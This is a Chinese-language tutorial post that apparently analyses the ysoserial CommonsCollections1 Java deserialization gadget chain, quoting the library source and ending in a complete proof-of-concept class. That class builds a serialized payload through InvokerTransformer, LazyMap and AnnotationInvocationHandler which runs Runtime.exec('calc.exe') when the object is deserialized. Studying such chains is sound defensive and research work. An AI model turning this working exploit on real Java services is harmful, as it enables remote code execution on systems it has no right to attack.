ysoserial CommonsCollections1

1. /*
2.     Gadget chain:
3.         ObjectInputStream.readObject()
4.             AnnotationInvocationHandler.readObject()
5.                 Map(Proxy).entrySet()
6.                     AnnotationInvocationHandler.invoke()
7.                         LazyMap.get()
8.                             ChainedTransformer.transform()
9.                                 ConstantTransformer.transform()
10.                                 InvokerTransformer.transform()
11.                                     Method.invoke()
12.                                         Class.getMethod()
13.                                 InvokerTransformer.transform()
14.                                     Method.invoke()
15.                                         Runtime.getRuntime()
16.                                 InvokerTransformer.transform()
17.                                     Method.invoke()
18.                                         Runtime.exec()
19.     Requires:
20.         commons-collections
21. */

复制代码

0、先假设Runtime类可序列化，最终要实现：

1. Runtime runtime = Runtime.getRuntime();
2. runtime.exec("calc.exe");

复制代码

1、从最后一步开始，调用InvokerTransformer.transform()

1. public InvokerTransformer(String methodName, Class[] paramTypes, Object[] args) {
2.         super();
3.         iMethodName = methodName;
4.         iParamTypes = paramTypes;
5.         iArgs = args;
6.     }<br>

复制代码

1. public Object transform(Object input) {<br>    if (input == null) {<br>        return null;<br>    }<br>    try {<br>        Class cls = input.getClass();<br>        Method method = cls.getMethod(iMethodName, iParamTypes);<br>        return method.invoke(input, iArgs);<br>            <br>    } catch (NoSuchMethodException ex) {<br>        throw new FunctorException("InvokerTransformer: The method '" + iMethodName + "' on '" + input.getClass() + "' does not exist");<br>    } catch (IllegalAccessException ex) {<br>        throw new FunctorException("InvokerTransformer: The method '" + iMethodName + "' on '" + input.getClass() + "' cannot be accessed");<br>    } catch (InvocationTargetException ex) {<br>        throw new FunctorException("InvokerTransformer: The method '" + iMethodName + "' on '" + input.getClass() + "' threw an exception", ex);<br>    }<br>}

复制代码

1.  

复制代码

transform方法实现了完整的反射，通过InvokerTransformer构造方法传入方法和参数。
所以这一步的利用链

1. InvokerTransformer invokerTransformer = new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc.exe"}).transform(runtime);

复制代码

2、InvokerTransformer的transform的调用，在ChainedTransformer的transform实现。
public ChainedTransformer(Transformer[] transformers) {
        　　super();
        　　iTransformers = transformers;
    }
public Object transform(Object object) {
        　　for (int i = 0; i < iTransformers.length; i++) {
            　　　　object = iTransformers.transform(object);
        　　}
        　　return object;
}
如果Transformer[]里面的对象是：
Transformer[0]：new ConstantTransformer(runtime)
Transformer[1]：invokerTransformer
第一次循环：(new ConstantTransformer(runtime)).transform() runtime对象返回给object
第二次循环：invokerTransformer.transform(runtime)
所以这一步的利用链：
ChainedTransformer chainedTransformer = new ChainedTransformer(new Transformer[]{new ConstantTransformer(runtime),invokerTransformer});
        chainedTransformer.transform(1);
3、ChainedTransformer的transform谁来调？LazyMap的get方法存在transform调用（key不存在的时候）。

1. public class LazyMap
2.         extends AbstractMapDecorator
3.         implements Map, Serializable {
4.     public static Map decorate(Map map, Transformer factory) {
5.         return new LazyMap(map, factory);
6.     }
8.     protected LazyMap(Map map, Transformer factory) {
9.         super(map);
10.         if (factory == null) {
11.             throw new IllegalArgumentException("Factory must not be null");
12.         }
13.         this.factory = factory;
14.     }
17.     private void writeObject(ObjectOutputStream out) throws IOException {
18.         out.defaultWriteObject();
19.         out.writeObject(map);
20.     }
22.     private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException {
23.         in.defaultReadObject();
24.         map = (Map) in.readObject();
25.     }
27.     //-----------------------------------------------------------------------
28.     public Object get(Object key) {
29.         // create value for key if key is not currently in the map
30.         if (map.containsKey(key) == false) {
31.             Object value = factory.transform(key);
32.             map.put(key, value);
33.             return value;
34.         }
35.         return map.get(key);
36.     }
37. }

复制代码

通过decorate方法，修改this.factory为chainedTransformer对象，最后通过get不存在的key调用chainedTransformer的transform
所以利用链
HashMap hashMap = new HashMap();
LazyMap lazyMap = (LazyMap) LazyMap.decorate(hashMap,chainedTransformer);
lazyMap.get(1);
4、lazyMap的get谁来调用？这里面用的AnnotationInvocationHandler的invoke，该方法存在某个属性的get，属性可通过构造方法改变。

1. class AnnotationInvocationHandler implements InvocationHandler, Serializable {
2.     private static final long serialVersionUID = 6182022883658399397L;
3.     private final Class<? extends Annotation> type;
4.     private final Map<String, Object> memberValues;
6.     AnnotationInvocationHandler(Class<? extends Annotation> type, Map<String, Object> memberValues) {
7.         Class<?>[] superInterfaces = type.getInterfaces();
8.         if (!type.isAnnotation() ||
9.             superInterfaces.length != 1 ||
10.             superInterfaces[0] != java.lang.annotation.Annotation.class)
11.             throw new AnnotationFormatError("Attempt to create proxy for a non-annotation type.");
12.         this.type = type;
13.         this.memberValues = memberValues;
14.     }
16.     public Object invoke(Object proxy, Method method, Object[] args) {
17.         String member = method.getName();
18.         Class<?>[] paramTypes = method.getParameterTypes();
20.         // Handle Object and Annotation methods
21.         if (member.equals("equals") && paramTypes.length == 1 &&
22.             paramTypes[0] == Object.class)
23.             return equalsImpl(args[0]);
24.         if (paramTypes.length != 0)
25.             throw new AssertionError("Too many parameters for an annotation method");
27.         switch(member) {
28.         case "toString":
29.             return toStringImpl();
30.         case "hashCode":
31.             return hashCodeImpl();
32.         case "annotationType":
33.             return type;
34.         }
36.         // Handle annotation member accessors
37.         Object result = memberValues.get(member);
39.         if (result == null)
40.             throw new IncompleteAnnotationException(type, member);
42.         if (result instanceof ExceptionProxy)
43.             throw ((ExceptionProxy) result).generateException();
45.         if (result.getClass().isArray() && Array.getLength(result) != 0)
46.             result = cloneArray(result);
48.         return result;
49.     }
51.     /**
52.      * This method, which clones its array argument, would not be necessary
53.      * if Cloneable had a public clone method.
54.      */<br><br>

复制代码

因为AnnotationInvocationHandler类非public，通过反射调用
Class c = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
Constructor declaredConstructor = c.getDeclaredConstructor(Class.class, Map.class);
declaredConstructor.setAccessible(true);
InvocationHandler handler = (InvocationHandler) declaredConstructor.newInstance(Retention.class, lazyMap);
对象初始化memberValues，得到对象handler，接下来就是让handler对象执行invoke
Map proxyMap = (Map) Proxy.newProxyInstance(Map.class.getClassLoader(), new Class[]{Map.class}, handler);
proxyMap已经有了，那么应该怎么触发handler执行方法，来调用invoke方法
AnnotationInvocationHandler的readobject方法，存在对memberValues执行entrySet()
所以用proxyMap对象重新生成一个AnnotationInvocationHandler对象
InvocationHandler handle = (InvocationHandler) declaredConstructor.newInstance(Retention.class, proxyMap);
handle
以下是AnnotationInvocationHandler的readobject重写

1. private void readObject(java.io.ObjectInputStream s)
2.         throws java.io.IOException, ClassNotFoundException {
3.         s.defaultReadObject();
5.         // Check to make sure that types have not evolved incompatibly
7.         AnnotationType annotationType = null;
8.         try {
9.             annotationType = AnnotationType.getInstance(type);
10.         } catch(IllegalArgumentException e) {
11.             // Class is no longer an annotation type; time to punch out
12.             throw new java.io.InvalidObjectException("Non-annotation type in annotation serial stream");
13.         }
15.         Map<String, Class<?>> memberTypes = annotationType.memberTypes();
17.         // If there are annotation members without values, that
18.         // situation is handled by the invoke method.
19.         for (Map.Entry<String, Object> memberValue : memberValues.entrySet()) {
20.             String name = memberValue.getKey();
21.             Class<?> memberType = memberTypes.get(name);
22.             if (memberType != null) {  // i.e. member still exists
23.                 Object value = memberValue.getValue();
24.                 if (!(memberType.isInstance(value) ||
25.                       value instanceof ExceptionProxy)) {
26.                     memberValue.setValue(
27.                         new AnnotationTypeMismatchExceptionProxy(
28.                             value.getClass() + "[" + value + "]").setMember(
29.                                 annotationType.members().get(name)));
30.                 }
31.             }
32.         }
33.     }<br><br>最后AnnotationInvocationHandler对象反序列化，执行readobject也就触发了proxyMap的invoke方法<br>

复制代码

要解决的问题：Runtime类未实现Serializable，需要使用反射调用，反射方法用什么来触发执行？
Runtime runtime = Runtime.getRuntime();
runtime.exec("calc.exe");
反射方式实现：
Class cr = Class.forName("java.lang.Runtime");
Method getRuntime = cr.getMethod("getRuntime", null);
Runtime runtime = (Runtime) getRuntimemethod.invoke(null, null);
Method execmethod = cr.getMethod("exec", String.class);
execmethod.invoke(runtimemethod,"calc.exe");
反射方法通过InvokerTransformer实现
Class cr = Class.forName("java.lang.Runtime");
Method getRuntimemethod = (Method) new InvokerTransformer("getMethod", new Class[]{String.class,Class[].class}, new Object[]{"getRuntime", null}).transform(cr);
Runtime runtimemethod = (Runtime) new InvokerTransformer("invoke", new Class[]{Object.class,Object[].class}, new Object[]{null, null}).transform(getRuntimemethod);
new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc.exe"}).transform(runtimemethod);
ChainedTransformer中的transform正好实现了这组链的调用

1. public Object transform(Object object) {
2.         for (int i = 0; i < iTransformers.length; i++) {
3.             object = iTransformers[i].transform(object);
4.         }
5.         return object;
6.     }<br><br>所以最后runtime的实现利用链：<br>

复制代码

Transformer[] transformers = {
                　　new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
                　　new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
                　　new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc.exe"})
        };
ChainedTransformer chainedTransformerruntime = new ChainedTransformer(transformers);
chainedTransformerruntime.transform(cr);
最终实现的利用链：

1. public class CC1Test3 {
2.     public static void main(String[] args) throws Exception {
4.         Class cr = Class.forName("java.lang.Runtime");
6.         Transformer[] transformers = {
7.                 new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
8.                 new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
9.                 new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc.exe"})
10.         };
11.         ChainedTransformer chainedTransformerruntime = new ChainedTransformer(transformers);
13.         ChainedTransformer chainedTransformer = new ChainedTransformer(new Transformer[]{new ConstantTransformer(cr),chainedTransformerruntime});
15.         HashMap hashMap = new HashMap();
16.         LazyMap lazyMap = (LazyMap) LazyMap.decorate(hashMap,chainedTransformer);
18.         Class c = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
19.         Constructor declaredConstructor = c.getDeclaredConstructor(Class.class, Map.class);
20.         declaredConstructor.setAccessible(true);
22.         InvocationHandler handler = (InvocationHandler) declaredConstructor.newInstance(Retention.class, lazyMap);
24.         Map proxyMap = (Map) Proxy.newProxyInstance(Map.class.getClassLoader(), new Class[]{Map.class}, handler);
25.         InvocationHandler handle = (InvocationHandler) declaredConstructor.newInstance(Retention.class, proxyMap);
27.         ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream("D:\\cc1.ser"));
28.         objectOutputStream.writeObject(handle);
30.         ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream("D:\\cc1.ser"));
31.         objectInputStream.readObject();
32.     }
33. }

复制代码

 

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！